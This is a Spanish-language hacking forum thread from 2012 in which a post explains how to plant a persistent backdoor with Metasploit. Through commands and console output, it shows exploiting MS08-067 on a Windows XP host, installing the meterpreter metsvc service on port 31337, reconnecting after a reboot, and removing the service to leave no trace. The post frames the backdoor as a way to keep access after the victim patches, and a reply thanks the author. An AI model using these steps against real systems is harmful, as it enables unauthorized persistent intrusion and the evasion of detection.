comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Como crear un BackDoor con Metasploit

  • 1 Respuestas
  • 2210 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Pekador

  • *
  • Underc0der
  • Mensajes: 30
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Abril 23, 2012, 04:08:15 pm »
Lo primero es que necesitamos una sesión de meterpreter en el sistema remoto.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 489 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
=[ svn r8074 updated today (2010.01.05)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
LHOST => 172.16.83.1
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3
- lang:English[*] Selected Target: Windows XP SP3 English (NX)[*]
Triggering the vulnerability...[*] Sending stage (723456 bytes)[*]
Meterpreter session 3 opened (172.16.83.1:54745 ->
172.16.83.128:4444)

meterpreter >

Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
meterpreter > run metsvc[*] Creating a meterpreter service on port
31337[*] Creating a temporary installation directory
C:\WINDOWS\TEMP\HdOFwlxzpobWuh...[*] >> Uploading metsrv.dll...[*]
>> Uploading metsvc-server.exe...[*] >> Uploading
metsvc.exe...[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.

Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
meterpreter > reboot
Rebooting...
meterpreter >

Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.

Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/metsvc_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(handler) > exploit

[*] Starting the payload handler...[*] Started bind handler[*]
Meterpreter session 1 opened (172.16.83.1:42050 ->
172.16.83.128:31337)

meterpreter >

Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.

Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
meterpreter > run metsvc -r[*] Removing the existing Meterpreter
service[*] Creating a temporary installation directory
C:\WINDOWS\TEMP\QQqawIYOjLq...[*] >> Uploading metsvc.exe...[*]
Stopping the service...
* Stopping service metsvc
* Removing service
Service metsvc successfully removed.

meterpreter >

Y quedará metsvc completamente desinstalado sin perder la sesión que estamos utilizando (Por si cambiamos de idea xD)

Y bueno ahora ya está todo ;) Muy sencillo, muy fácil y sobre todo, explicado de una manera sencilla para todos.

Autor del post: Joker
« Última modificación: Abril 23, 2012, 04:26:02 pm por Pr0ph3t »
?

Desconectado andrewtwo

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 30, 2012, 05:02:39 am »
Genial no me sabia el  run metsvc
  • veo que es xp hay que ver si funciona con otras versiones igual, buen dato  ;)

 

¿Te gustó el post? COMPARTILO!



Los 3 modos más comunes de hackear WordPress y cómo evitarlo

Iniciado por Hackmundy

Respuestas: 2
Vistas: 6042
Último mensaje Marzo 06, 2013, 01:15:42 am
por b166er
[VIDEO] Como subir una shell a Wordpress

Iniciado por unkdown

Respuestas: 2
Vistas: 2290
Último mensaje Diciembre 13, 2015, 07:12:12 pm
por Gabriela
Como Encontrar el AdminPanel (Algunos Metodos)

Iniciado por hdbreaker

Respuestas: 4
Vistas: 3102
Último mensaje Junio 25, 2012, 03:34:37 pm
por Satyricon
Como hacer una BackConect By Okol

Iniciado por Okol

Respuestas: 12
Vistas: 4832
Último mensaje Septiembre 17, 2012, 02:35:10 am
por Mr_Pack
¿Que es un Buffer Overflow?¿Como explotarlo?

Iniciado por HckDrk

Respuestas: 3
Vistas: 2581
Último mensaje Noviembre 24, 2012, 07:21:39 am
por Pr0ph3t